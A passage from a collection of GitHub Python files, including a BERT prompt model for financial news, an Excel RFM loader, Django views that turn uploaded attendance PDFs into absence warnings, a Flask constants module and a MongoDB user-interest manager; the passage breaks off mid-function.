{self.tokenizer.encode('[MASK]', add_special_tokens=False)},\"\n f\" : {self.tokenizer.encode('', add_special_tokens=False)}\")\n logging.info(f\"Prompt: + {self.prompt_positives_indexes} - {self.prompt_negatives_indexes}\")\n\n def _get_index(self, s):\n # result = [self.vocabs[\"model\"][\"vocab\"][ch] for ch in s]\n if \"xlm-roberta\" in self.config.model_name:\n result = []\n for ch in s:\n sub_result = self.tokenizer.encode(ch, add_special_tokens=False)\n if sub_result[0] == 6 and len(sub_result) == 2:\n result.append(sub_result[1])\n else:\n # ?!\n sub_result = self.tokenizer.encode(\"测\" + ch, add_special_tokens=False)\n assert sub_result[0] == 6 and len(sub_result) == 3, sub_result\n result.append(sub_result[2])\n else:\n result = [self.tokenizer.encode(ch, add_special_tokens=False)[0] for ch in s]\n return result\n\n def forward(self, x1, x2):\n # b * 512, b * 512, b\n context_text, mask_text, prompt_pos = x1[0], x1[2], x1[3]\n predict = self.bert(context_text, attention_mask=mask_text)[0] # b, max_len, vocab_size\n positive_result, negative_result = [], []\n for i in range(self.config.batch_size):\n positive_result.append(predict[i][prompt_pos[i]][self.prompt_positives_indexes])\n negative_result.append(predict[i][prompt_pos[i]][self.prompt_negatives_indexes])\n # b * len(prompt_positive)\n pos_tensor, neg_tensor = torch.stack(positive_result), torch.stack(negative_result)\n return neg_tensor, pos_tensor\n","repo_name":"PotassiumWings/Negative-financial-information-determination","sub_path":"models/prompt_model.py","file_name":"prompt_model.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30555604426","text":"import os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sys\r\n\r\nclass XlsLoading ( object ):\r\n# Charging the xls file\r\n\r\n# Constructor\r\n def __init__ ( self):\r\n self.namefile = \"\"\r\n self.pandasxls = \"\"\r\n self.namesheetselectionned = \"\"\r\n self.yoursheet = \"\"\r\n self.xls_file = \"\"\r\n self.id = \"\"\r\n self.r = \"\"\r\n self.f = \"\"\r\n self.m = \"\"\r\n \r\n# End of constructor\r\n \r\n# Loading xls file \r\n def LoadingXlsFile ( self ):\r\n while True:\r\n self.namefile = input(\"Name of the xls file to load (don't forget the extension) :\")\r\n if os.path.isfile (self.namefile):\r\n print ( \"the file is been loaded\" )\r\n self.pandasxls = pd.ExcelFile(self.namefile)\r\n break\r\n else:\r\n print ( \"the file don't exist\" )\r\n continue\r\n # End of Loading xls file and transform into pandas dataframe \r\n\r\n# Select the good sheet\r\n def XlsSelectTheGoodSheet (self) :\r\n xls_file = pd.ExcelFile(self.namefile)\r\n self.sheets = xls_file.sheet_names\r\n print (\"This is your worksheet in this document\",self.sheets)\r\n while True :\r\n self.yoursheet = input(\"Please, select your worksheet : \")\r\n if self.yoursheet in self.sheets:\r\n print (\"Your worksheet is been charged\")\r\n break\r\n self.customersdf = xls_file.parse(self.yoursheet) # define as the principal dataframe for pandas\r\n print (self.customersdf)\r\n else:\r\n print(\"this worksheet don't exist\")\r\n continue\r\n# End Select the good sheet\r\n \r\n# Select the features for clustering \r\n def SelectFeaturesForClustering(self):\r\n print (\"---------------------------------------------------------------------------\")\r\n print (\"It's time to select yours features for clustering, look the list on the top\")\r\n print (\"---------------------------------------------------------------------------\")\r\n self.id = input(\"Please type de name of the customer id feature : \")\r\n self.r = input(\"Please type de name of recency feature : \")\r\n self.f = input(\"Please type de name of the frequency feature : \")\r\n self.m = input(\"Please type de name of the monetary feature : \")\r\n \r\n# End Select the features for clustering \r\n\r\n\r\n","repo_name":"lotito/RFM_CLUSTERING_PROD","sub_path":"LoadingFile.py","file_name":"LoadingFile.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38986879429","text":"def Promedio_Notas(codigo1: str, Exa1: float, nota1: float, codigo2: str, Exa2: float, nota2: float, codigo3: str, Exa3:float, nota3 : float) -> str :\n if codigo1 == \"111\":\n mat = (Exa1 * 0.9) + (nota1 * 0.1)\n else:\n #mensaje=\"CODIGO DE MATEMATCA NO EXISTE\"\n print(\"CODIGO MATEMATCA NO EXISTE\")\n mat = 0\n #return mensaje\n if codigo2 == \"222\":\n fis = (Exa2 * 0.8) + (nota2 * 0.2)\n else:\n #mensaje = \"CODIGO DE FISICA NO EXISTE\"\n print(\"CODIGO FISICA NO EXISTE\")\n fis = 0\n #return mensaje\n if codigo3 == \"333\":\n qui = (Exa3 * 0.85) + (nota3 * 0.15)\n else:\n #mensaje=\"CODIGO DE QUIMICA NO EXISTE\"\n print(\"CODIGO QUÍMICA NO EXISTE\")\n qui = 0\n #return mensaje\n #print(mat,fis,qui)\n promedio=(mat+fis+qui)/3\n promTotal = round(promedio, 2)\n if promTotal >= 3.0:\n mensaje= f\"Paso el promedio con {promTotal}\"\n else:\n mensaje= f\"No paso el promedio con {promTotal}\"\n\n return mensaje\n #f\"El promedio Total ajustado del estudiante es: {promTotal}\"\n\ncodigo1 = str(input(\"Ingrese codigo de matematicas: \"))\ncodigo2 = str(input(\"Ingrese codigo de Fisica: \"))\ncodigo3 = str(input(\"Ingrese codigo de Quimica: \"))\nExa1=float(input(\"Ingrese nota de examen de matemticas: \"))\nnota1=float(input(\"Ingrese nota de trabajos de matemticas: \"))\nExa2=float(input(\"Ingrese nota de examen de FISICA: \"))\nnota2=float(input(\"Ingrese nota de trabajos de FISICA: \"))\nExa3=float(input(\"Ingrese nota de examen de QUÍMICA: \"))\nnota3=float(input(\"Ingrese nota de trabajos de QUÍMICA: \"))\nprint(Promedio_Notas(codigo1,Exa1,nota1,codigo2,Exa2,nota2,codigo3,Exa3,nota3))","repo_name":"ClaudiaMoraC/Ciclo1_Python","sub_path":"RetoSemana2.py","file_name":"RetoSemana2.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36076482352","text":"import unittest\nfrom plantmap_plugin.export import Export\nfrom PyQt4 import QtGui, uic\nfrom PyQt4.QtGui import QMessageBox, QComboBox\nfrom PyQt4.QtXml import QDomDocument\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport zipfile\nimport os.path\n\nclass TestExport(unittest.TestCase):\n\n\tdef test_generate_export_class(self):\n\t\tpath = \"/home/travis/build/JJardin77580/plantMap/test/poject\"\n\t\tlistExt = [\"PNG\", \"JPEG\", \"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tself.assertTrue(ex.path, path)\n\t\tself.assertTrue(ex.listOfExtensionImg, listExt)\n\n\tdef test_list_img(self):\n\t\tpath = \"/home/travis/build/JJardin77580/plantMap/test/poject\"\n\t\tlistExt = [\"PNG\", \"JPEG\", \"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tex.fill_list_of_img()\n\t\t\n\n\tdef test_construc_archive(self):\n\t\tpath = \"/home/travis/build/JJardin77580/plantMap/test/poject\"\n\t\tlistExt = [\"PNG\", \"JPEG\", \"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tex.fill_list_of_img()\n\t\tex.fill_list_of_metadata()\n\t\tex.intersect_list_image_metadata()\n\t\tzipFile = ex.createZip()\n\n\t\twith zipfile.ZipFile(zipFile, \"r\") as z:\n\t\t\tz.extractall(path+\"/pythanUnZip\")\n\n\t\tos.chdir(path+'/pythanUnZip')\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/plantmapTest_28.JPEG')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/plantmapTest_51.JPEG')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/metadata/plantmapTest_28.JPEG.json')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/metadata/plantmapTest_51.JPEG.json')))\n\t\tself.assertFalse(os.path.isfile((path+'/pythanUnZip/plantmapTest_14.JPEG')))\n\nif __name__=='__main__':\n\tunittest.main()","repo_name":"Max77T/plantmap-plugin","sub_path":"test/testExport.py","file_name":"testExport.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12155227017","text":"from django.shortcuts import render\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponse \nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .PorcesarPdf import ProcesarPdfs\nfrom .GenInforme import *\n\nfrom django.conf import settings\n#from django.utils.encoding import str\nfrom django.template import Template, Context\n\n#from ProcesarApercibimientos import *\nimport re\nimport os\nimport zipfile\nfrom xhtml2pdf import pisa\nimport shutil\nimport datetime\n\n\n## Vista de modificacion de apercibimientos.\n\n@login_required\ndef ModAper (request):\n\n\tif request.method == 'GET':\n\t\tc = set()\n\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\tc.add(ele['Curso'])\n\t\treturn render(request,\"ModAper.html\",{'curso':c})\n\n\n\tif request.method == 'POST':\n\t\ttry:\n\t\t\tCurso = request.POST[\"Curso\"]\n\t\t\tAlumno = request.POST[\"Alumno\"]\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\t\n\t\t\tAlumnoApercibimiento = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Apercibimiento\").values().order_by(\"Materia\")\n\t\t\tAlumnoIgnorado = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Ignorado\").values().order_by(\"Materia\")\n\t\t\treturn render(request,\"ModAper.html\",{'AperIgnorado':AlumnoIgnorado,'AperAlumno':AlumnoApercibimiento,'curso':c,'Alumno':Alumno})\n\n\t\texcept:\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\n\t\t\tfor DataPost in request.POST:\n\t\t\t\tif not \"csrfmiddlewaretoken\" == DataPost:\t\t\t\t\t\n\t\t\t\t\tup = Faltas_Asistencia.objects.filter(id=int(DataPost))\t\t\t\t\t\n\t\t\t\t\tif up.values()[0]['Estado'] == \"Apercibimiento\":\n\t\t\t\t\t\tup.update(Estado='Ignorado')\t\t\t\t\t\t\n\t\t\t\t\telif up.values()[0]['Estado'] == \"Ignorado\":\n\t\t\t\t\t\tup.update(Estado='Apercibimiento')\t\t\t\t\t\n\t\t\t\t\tAlumno = up.values()[0]['Alumno']\n\t\t\t\t\tCurso = up.values()[0]['Curso']\t\t\t\n\t\t\tAlumnoApercibimiento = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Apercibimiento\").values().order_by(\"Materia\")\n\t\t\tAlumnoIgnorado = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Ignorado\").values().order_by(\"Materia\")\n\t\t\treturn render(request,\"ModAper.html\",{'AperIgnorado':AlumnoIgnorado,'AperAlumno':AlumnoApercibimiento,'curso':c,'Alumno':Alumno})\n\t\n\t\t\t\n## Vista principal de las accioes que se pueden realizar.\n\n@login_required\ndef pdfprin (request):\n\tPdf_error_cnt = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\tPdf_error_fecha = Pdfs.objects.filter(Estado=\"FechaError\").values().count()\t\n\treturn render(request,\"pdfges.html\",{\"pdferrorcont\":Pdf_error_cnt,'FechaError':Pdf_error_fecha})\n\n# Sube los pdf o los zip\n@login_required\ndef pdfsubir (request):\n\n\tif request.method == 'POST':\t\t\n\t\tform = PdfForms(request.POST,request.FILES)\t\t\n\t\t\n\t\tif form.is_valid():\t\n\t\t\ta = Pdfs()\n\t\t\ta.NombrePdf = str(datetime.date.today()) + ' PDF - ' + str(Pdfs.objects.all().count()+1)\n\t\t\ta.Estado = 'SinProcesar'\n\t\t\ta.FechaSubida = datetime.date.today()\n\t\t\ta.pdf = request.FILES['pdf']\n\t\t\ta.save()\n\t\t\tdescomprimir_zip()\n\t\t\tProcesarPdfs().start()\t\n\t\t\treturn HttpResponseRedirect('/')\t\t\n\t\n\tform = PdfForms()\n\treturn render(request,'pdfsubir.html',{'form':form})\n\n# Muestra los rejistros con errores para solucionar de manera manual\n@login_required\ndef error (request):\n\n\tif request.method == 'GET':\n\n\t\tMensaje = ''\n\t\tPdf_error_cnt = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\t\tpdf_error = Faltas_Asistencia.objects.filter(Estado=\"Error\").values()\n\t\tPdfErrorFechaCnt = Pdfs.objects.filter(Estado=\"FechaError\").values().count()\n\t\tPdfErrorFecha = Pdfs.objects.filter(Estado=\"FechaError\").values()\n\n\t\tif int(PdfErrorFechaCnt) == 0 and int(Pdf_error_cnt) == 0 :\n\t\t\tMensaje = \"No existe mas problemas por solucionar\"\n\n\t\treturn render(request,\"error.html\",{'Mensaje':Mensaje,'PdfErrorFecha':PdfErrorFecha,'PdfErrorFechaCnt':PdfErrorFechaCnt,'PdfErrorCnt':Pdf_error_cnt,'pdfs':pdf_error})\n\n\tif request.method == 'POST':\n\n\t\tPdfErrorFecha = Pdfs.objects.filter(Estado=\"FechaError\")\t\t\n\t\tfor ele in PdfErrorFecha.values(\"pdf\"):\n\t\t\tos.remove(ele['pdf'])\n\t\tPdfErrorFecha.delete()\n\t\treturn HttpResponseRedirect('/error')\t\n\n\n\n# Busca los fichero zip los descomprime y los anade a la tabla pdf sin procesar, despues elimina el zip\n\ndef descomprimir_zip ():\n\n\t# Limpiando Directorios\n\n\tfor folder, subfolders, files in os.walk('tmp/'):\n\t\t\t\tfor file in files:\n\t\t\t\t\tif file.endswith('.pdf'):\n\t\t\t\t\t\tos.remove('tmp/'+file)\n\n\t# descomprimiendo zip\n\n\tfor folder, subfolders, files in os.walk('pdfs/'):\n\t\tfor file in files:\n\t\t\tif file.endswith('.zip'):\n\t\t\t\tcomando = 'unzip ' + 'pdfs/' + str(file) + ' -d ' + 'tmp'\n\t\t\t\tos.system(comando)\n\t\t\t\tz = Pdfs.objects.filter(pdf='pdfs/'+file)\n\t\t\t\tz.delete()\n\t\t\t\tos.system('rm '+'pdfs/'+'\\\"'+file+'\\\"')\n\n\t# Anadiendo los pdf comprimidos\n\n\tfor folder, subfolders, files in os.walk('tmp/'):\n\t\tfor file in files:\n\t\t\tif file.endswith('.pdf'):\n\t\t\t\tinsert = Pdfs()\n\t\t\t\tinsert.NombrePdf = str(datetime.date.today()) + ' PDF - ' + str(Pdfs.objects.all().count()+1)\n\t\t\t\tinsert.Estado = 'SinProcesar'\n\t\t\t\tinsert.pdf = 'pdfs/'+str(file)\n\t\t\t\tinsert.save()\n\t\t\t\tos.system('cp '+ '\\\"' +'tmp/'+str(file)+ '\\\"' + ' pdfs/')\n\t\t\t\tos.system('rm '+'tmp/'+'\\\"'+str(file)+'\\\"')\t\n\n## Actualiza los rejistro erroneos con la informacion proporcionada mediante el formulario\n@login_required\ndef erroract (request,pk):\n\n\tif request.method == 'POST':\t\t\n\t\tform = PdfForms(request.POST,request.FILES)\t\n\t\tif form.is_valid:\t\n\n\t\t\t__dato2 = str(request.POST['JustifiacdadPorcentaje']).replace(',','.')\n\t\t\t__dato4 = str(request.POST['InjustificadasPorcentaje']).replace(',','.')\n\n\t\t\tact = Faltas_Asistencia.objects.filter(id=pk)\n\t\t\tact.update(\n\n\t\t\t\tJustificadasHoras = int(request.POST['JustificadasHoras'][0:request.POST['JustificadasHoras'].index(':')]),\n\t\t\t\tJustificadasPorcentaje = float(__dato2.replace('%','')),\n\t\t\t\tInjustificadasHoras = int(request.POST['InjustificadaHoras'][0:request.POST['InjustificadaHoras'].index(':')]),\n\t\t\t\tInjustificadasPorcentaje =float(__dato4.replace('%','')),\n\t\t\t\tRetrasos = \tint(request.POST['Retrasos'][0:request.POST['Retrasos'].index(':')]),\n\t\t\t\tEstado = \"Correcto\" )\n\n\t\t\tBuscarAper()\n\t\t\treturn HttpResponseRedirect('/error')\n\n\talumnos = Faltas_Asistencia.objects.filter(id=pk).values()\n\tform = Faltas_Asistencia_Actualizar()\n\treturn render(request,\"erroract.html\",{'form':form,'alumno':alumnos})\n\n\ndef BuscarAper ():\n\trejistros = Faltas_Asistencia.objects.filter(Estado=\"Correcto\").values()\n\tfor ele in rejistros :\n\t\tif (float(ele['HorasLectivas'])/float(ele['TotalPeriodo'])) <= float(0.2) :\n\t\t\tif float(ele['InjustificadasPorcentaje']) >= float(settings.APER_PORCENTAJE_1SEM) :\n\t\t\t\tact = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tact.update(Estado='Apercibimiento')\n\t\t\telse:\n\t\t\t\tdell = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tdell.delete()\n\t\t\t\n\t\telse :\n\t\t\tif float(ele['InjustificadasPorcentaje']) >= float(settings.APER_PORCENTAJE_MAS_1SEM) :\n\t\t\t\tact = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tact.update(Estado='Apercibimiento')\n\t\t\telse:\n\t\t\t\tdell = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tdell.delete()\n\n## Esta vista genera los apercibimientos para los alumnos de un curso\n@login_required\ndef InformePorCursos (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values(\"FechaDesde\",\"FechaHasta\",\"Curso\"):\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\n\n\tsorted(c)\n\tsorted(m)\n\tsorted(a)\n\n\tif request.method == 'POST':\t\n\n\t\ttry:\n\t\t\tError = Faltas_Asistencia.objects.filter(Estado=\"Error\",Curso=request.POST[\"Curso\"]).values().count()\n\t\texcept :\n\t\t\tError = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\n\t\tif not int(Error) > 0 :\n\t\t\tIn = GenInformeCurso(request)\t\t\t\n\t\t\tif not In.Fin :\t\t\t\n\t\t\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':'No Existe Apercibimientos'})\t\t\n\t\n\t\telse:\n\t\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':'Existen erroes en el curso a procesar, porfavor solucione antes los problemas'})\t\t\n\n\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':True,'Mensaje':''}) \t\n\t\t\n\n\tif request.method == 'GET':\n\n\t\tProcesarPdfs().start()\n\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False})\n\n## Paguina informe para profesores.\n\n@login_required\ndef InformeTodosCursos (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\t\t\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values():\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\t\n\t\n\tsorted(c)\n\tsorted(m)\n\tsorted(a)\n\n\tif request.method == 'POST':\n\t\t\t\n\t\tano = int(request.POST['Ano'])\n\t\tmes = int(request.POST['Mes'])\n\t\tIn = InformeTodosCursosClas(request)\n\t\tif len(In.data) == 0 :\n\t\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':True,'Mensaje':\"\"})\t\n\n\tif request.method == 'GET':\t\n\n\t\tProcesarPdfs().start()\t\n\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False})\n\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\n\n\ndef AperPorMaterias (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('FechaDesde','FechaHasta','Curso'):\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\n\n\tsorted(m)\n\tsorted(a)\n\tsorted(c)\n\t\n\tif request.method == 'GET':\n\t\tProcesarPdfs().start()\n\t\treturn render(request,\"MenuAperMes.html\", {'anos':a,'mes':m,'curso':c})\n\t\n\tif request.method == 'POST':\n\t\tGen = InformePorMaterias(request)\t\n\t\ttry:\n\t\t\tif not Gen.InformeGen:\n\t\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\t\t\telse:\n\t\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':True})\n\n\t\texcept AttributeError :\n\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\n\ndef AcercaDe (request):\n\treturn render(request,\"acercade.html\",{'version':str(settings.VERSION)})\n\n\n\n# Vista Api\nclass FlatasApi (viewsets.ModelViewSet):\n\tqueryset = Faltas_Asistencia.objects.filter(Estado='Apercibimiento')\n\tserializer_class = SerializerFaltasAsistencia\n\n\nclass PdfsApi (viewsets.ModelViewSet):\n\tqueryset = Pdfs.objects.all()\n\tserializer_class = PdfsSerializer\n\n\t\n\n\n\t\n\n","repo_name":"edtlopez/ApercibimientosAuto","sub_path":"DjangoProyecto/pdf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18524165104","text":"import dataclasses\n\nfrom dreamtools import profiler\n\n\n@dataclasses.dataclass\nclass CDirectories:\n projet: str\n app: str = dataclasses.field(init=False)\n pics: str = dataclasses.field(init=False)\n registar: str = dataclasses.field(init=False)\n calendar: str = dataclasses.field(init=False)\n\n def __post_init__(self):\n self.app = profiler.path_build(self.projet, \"pm\")\n self.pics = profiler.path_build(self.projet, 'static/pics')\n self.registar = profiler.path_build(self.projet, 'static/registar')\n self.calendar = profiler.path_build(self.registar, 'calendar.yml')\n self.quizz_import = profiler.path_build(self.projet, 'static/sources/question.yml')\n\n profiler.makedirs(self.registar)\n\n\nclass Constantine:\n DIRECTORIES: CDirectories\n ACCESS_URI = None\n MASTER_PWD: str\n QUIZZ_CATEGORIES = {\n \"avis\": [(0, \"Négatif\"), (3, \"Plutot négatif\"), (5, \"Neutre\"), (7, \"Plutot positif\"), (10, \"Très positif\")],\n \"eval\": (1, 11),\n \"word\": 3\n }\n URIS_HOSTS_ALLOWED = []\n URIS_REQUIRED_HTTPS = False\n SECRET_SALT = None\n SECRET_KEY = None\n CONTENT_TYPE= {'Content-Type': \"application/json\"}\n OAUTH_CLIENT_ID = None\n OAUTH_CLIENT_SECRET = None\n\n\nACCESS = {\n 'development': {\n 'uri_access_authorize': 'http://kuratoro.3p0.net:5000/authorize',\n 'uri_access_token': 'http://kuratoro.3p0.net:5000/access_token',\n 'uri_access_register': 'http://kuratoro.3p0.net:5000/register',\n 'uri_access_user': 'http://kuratoro.3p0.net:5000/access'\n },\n 'production': {\n 'uri_access_authorize': 'https://kuratoro.3p0.net/authorize',\n 'uri_access_token': 'https://kuratoro.3p0.net/access_token',\n 'uri_access_register': 'https://kuratoro.3p0.net/register',\n 'uri_access_user': 'https://kuratoro.3p0.net/access'\n }\n}\n\nFLASH_MESSAGE = {\n 'ERR_FORM': (\"\"\"
Formulaire non valide
Vérifier saisie
\"\"\", 'alert'),\n 'ERR_CAPTCHA': ('
ERREUR CAPTCHA
', \"warning\"),\n 'ERR_USER_NOT_FOUND': (\n '
ERREUR IDENTIFICATION
Les informations fournies ne permettent pas de vous identifier
',\n \"warning\"),\n \"ACTION_SUCCESS\": ('
Opération effectuée avec succès
', \"success\"),\n 'REC_OK': ('
Enregistrement effectué
', \"success\"),\n 'CODE_SENT': (\n '
CODE DE VALIDATION
Un code vous a été envoyé dans votre boite électronique; N\\'hésitez pas à vérifier vos indésirables (spams)
',\n \"success\"),\n 'ERR_CODE_AUTH': ('
ERREUR CODE
Le code indiqué
', \"warning\"),\n 'ERR_SYS': (\n \"
ERREUR SYSTEME
Raffraichir la page et réintérer l'operation
Si l'erreur persiste contactez votre administrateur
\",\n \"alert\")\n}\n","repo_name":"couleurwest/couleurwest","sub_path":"home/controller/constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2462968723","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport datetime\n\nimport mock\nimport pytest\n\nsys.path.append('.')\nimport greeter\n\n@pytest.mark.parametrize(\"hour,min,sec,expect\", [\n ( 0, 0, 0, u'こんばんは'),\n ( 0, 0, 1, u'こんばんは'), \n ( 4, 59, 59, u'こんばんは'), \n ( 5, 0, 0, u'おはよう'), \n ( 5, 0, 1, u'おはよう'), \n (11, 59, 59, u'おはよう'), \n (12, 0, 0, u'こんにちは'), \n (12, 0, 1, u'こんにちは'), \n (17, 59, 59, u'こんにちは'), \n (18, 0, 0, u'こんばんは'), \n (18, 0, 1, u'こんばんは'), \n (23, 59, 59, u'こんばんは'), \n # (24, 0, 0, u'こんばんは'), \n])\ndef test_greet(hour, min, sec, expect):\n class datetimeMock(datetime.datetime):\n @classmethod\n def now(cls):\n return datetime.datetime(2000, 1, 1, hour, min, sec)\n with mock.patch('datetime.datetime', datetimeMock):\n assert greeter.greet() == expect\n\n","repo_name":"ts123/test-python","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21807070693","text":"#!/usr/bin/python\n\n# update all the subfolders under localdir\n# code modified from `codeboy2k`\n# (deprecated)\n# you can use\n# $ git submodule update --recursive\n\nimport re\nimport os\nimport sys\nimport subprocess\n\n# set localdir to the location where you want to\n# store your local copy of the GitHub repository\nd = './kicad'\n\nenv = {}\nenv.update(os.environ)\nsep = ';' if (re.compile('^[wW][Ii][Nn]').match(sys.platform)) else ':'\n\nargs = ['git', 'submodule', 'update']\ndirs = [x for x in os.listdir(d) if os.path.isdir(os.path.join(d, x))]\n\nfor dir in dirs:\n print(dir, ': ')\n sys.stdout.flush()\n os.chdir(os.path.join(d, dir))\n subprocess.call(args)\n os.chdir('../../')\n","repo_name":"lllaaa/kicad-offline-fp","sub_path":"update-fp.py","file_name":"update-fp.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32860686813","text":"from data_access.controller.UserController4Mongo import UserController4Mongo\nfrom data_access.models.User import User\nfrom utils.Logger import logging\n\n\nclass UserCore:\n def __init__(self):\n self.controller = UserController4Mongo()\n\n def add_user(self,_id, followed_company=None, followed_academy=None, followed_skill=None):\n user = User(_id=_id)\n if followed_skill:\n user.followed_skill = followed_skill if type(followed_skill) == list else [followed_skill]\n\n if followed_company:\n user.followed_company = followed_company if type(followed_company) == list else [followed_company]\n\n if followed_academy:\n user.followed_academy = followed_academy if type(followed_academy) == list else [followed_academy]\n\n if self.controller.get_data_by_id(_id=_id):\n logging.error(\"user {0} has already exists\".format(_id))\n return False\n else:\n self.controller.insert_data(user)\n return True\n\n def get_user(self,_id):\n users = self.controller.get_data_by_id(_id=_id)\n if users:\n return users[0]\n else:\n return None\n\n def update_add_interest(self,_id, followed_company=None, followed_academy=None, followed_skill=None, max_number=5):\n interests = self.get_interest_by_id(_id)\n result = {}\n # import pdb; pdb.set_trace()\n\n if followed_company:\n companies = interests['followed_company']\n if len(companies) >= max_number:\n result = {\"result\":\"failed\", \"log\":\">5\"}\n followed_company = None\n elif followed_company in companies:\n result = {'result':'failed', 'log':'already followed'}\n followed_company = None\n else:\n result = {'result':'success'}\n\n if followed_academy:\n academies = interests['followed_academy']\n if len(academies) >= max_number:\n result = {\"result\":\"failed\", \"log\":\">5\"}\n followed_academy = None\n elif followed_academy in academies:\n result = {'result':'failed', 'log':'already followed'}\n followed_academy = None\n else:\n result = {'result':'success'}\n\n if followed_skill:\n skills = interests['followed_skill']\n if len(skills) >= max_number:\n result = {\"result\":\"failed\", \"log\":\">5\"}\n followed_skill = None\n elif followed_skill in skills:\n result = {'result':'failed', 'log':'already followed'}\n followed_skill = None\n else:\n result = {'result':'success'}\n\n # import pdb; pdb.set_trace()\n try:\n if followed_skill or followed_company or followed_academy:\n self.controller.update_add_interest(_id, followed_company, followed_academy, followed_skill)\n except Exception as e:\n result = {'result':'failed', 'log':'unhandle exception'}\n return result\n\n def update_remove_interest(self,_id, followed_company=None, followed_academy=None, followed_skill=None):\n self.controller.update_remove_interest(_id, followed_company, followed_academy, followed_skill)\n\n def get_interest_by_id(self,_id,followed_company=True, followed_academy=True, followed_skill=True):\n return self.controller.get_interest_by_id(_id, followed_company, followed_academy, followed_skill)\n\n def is_followed(self,company_result, academy_result, terminology_result, user_id):\n interests = self.get_interest_by_id(user_id)\n result = {}\n # import pdb; pdb.set_trace()\n if company_result:\n 